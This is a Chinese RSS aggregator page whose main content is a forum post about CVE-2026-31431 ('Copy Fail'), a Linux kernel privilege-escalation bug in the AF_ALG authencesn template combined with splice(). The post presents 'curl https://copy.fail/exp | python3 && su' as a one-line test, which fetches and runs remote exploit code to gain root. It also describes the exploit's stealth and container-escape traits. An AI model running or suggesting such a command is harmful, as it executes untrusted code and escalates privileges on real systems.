惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

酷 壳 – CoolShell
酷 壳 – CoolShell
aimingoo的专栏
aimingoo的专栏
P
Proofpoint News Feed
宝玉的分享
宝玉的分享
MyScale Blog
MyScale Blog
The GitHub Blog
The GitHub Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
月光博客
月光博客
量子位
博客园 - 司徒正美
V
V2EX
I
InfoQ
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Vercel News
Vercel News
H
Hackread – Cybersecurity News, Data Breaches, AI and More
美团技术团队
N
Netflix TechBlog - Medium
L
LangChain Blog
IT之家
IT之家
Blog — PlanetScale
Blog — PlanetScale
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Stack Overflow Blog
Stack Overflow Blog
A
About on SuperTechFans
Microsoft Azure Blog
Microsoft Azure Blog

LINUX DO - 最新话题

谷歌云盘下载700g数据集,求方法 OpenAI推出了100美元的Pro订阅后,plus的Codex 5小时限额大幅缩水 之前买的super grok居然还没掉 关于CPA认证文件周限 佬们,默认CDK的要求是什么等级啊? 最新版本的微信群聊机器人方案 有没有人知道如何free号没有封,那么是否可以循环使用,因为我看主要是周限 L站改版了?吓我一跳,我以为我浏览器崩了 淘宝这种宽带可信吗,500兆移动宽带月费8元到2099年 docker内部应用访问宿主机mysql和redis时被拒绝connection refuse Erp全栈想转行做Ai有什么推荐的吗 boost有bug 佬们,有没有靠谱点的 Plus 购买渠道 大妈,狗妈用的 lg 服务有源头开源项目吗? 有人有能过验证码打码的嘛 上次帖里好像发过通过大模型来打码的 gpt plus 封号似乎也太快了点,一天就给封号了 按流量/token收费的国产官方AI推荐 我算是知道了为什么Oracle总是ABC了 佬友们帮我分析一下 ChatGPT Team账号只有一个人使用和4个席位邀请满了使用的总额度是一样的吗? gpt-free 10个带rt CPA反代claude是默认1m吗? 我终于敢说我做出来windows上tmux的替代了,目标windows/全平台最强的终端Ai编程工具 claude pro升级max,除了原来的$20,好像还能再领一次$100 关于AI agent的知识框架 独乐乐不如众乐乐,分享一下我的的AI对话程序 佬们自建网站支付问题是怎么解决的 怎么能让gpt模仿claude风格输出 codex free已经死了,下一个会是plus或者team吗 请问chatgpt pro里的fast模式,速度快了,降智吗
核弹级Linux提权漏洞
jam1024 · 2026-04-30 · via LINUX DO - 最新话题
一句话检测验证 (不废话版) curl https://copy.fail/exp | python3 && su 效果: CVE-2026-31431 (绰号 “Copy Fail” ) 漏洞详情 类型 :本地权限提升(Local Privilege Escalation,LPE),允许普通用户(unprivileged local user)直接获得 root 权限。 影响范围 :几乎所有主流 Linux 发行版(Ubuntu、RHEL、Debian、SUSE、Amazon Linux 等)从 2017 年以来 发布的内核版本。 成因 :Linux 内核中 AF_ALG 加密接口(具体是 authencesn 加密模板)的逻辑错误(straight-line logic bug),源于 2017 年的一次“原地优化”(in-place optimization)。该 bug 结合 splice() 系统调用,可实现对任意可读文件的 page cache (页面缓存)进行 受控的 4 字节写入 。 利用特点 : 门槛极低:只需一个 732 字节的纯 Python 脚本(仅用标准库),无需 race condition、无需内核地址泄露、无需特定发行版调优, 一次成功、跨架构/发行版通用 。 隐蔽性强:只修改内存中的页面缓存,不改动磁盘文件(重启或内存压力大时缓存会从磁盘重载,难以通过文件完整性检查发现)。 可用于 容器逃逸 :page cache 是主机全局共享的,容器内进程可借此攻破宿主机。 这个漏洞在 4 月 29 日公开披露(Theori / Xint Code 团队) 1 个帖子 - 1 位参与者 阅读完整话题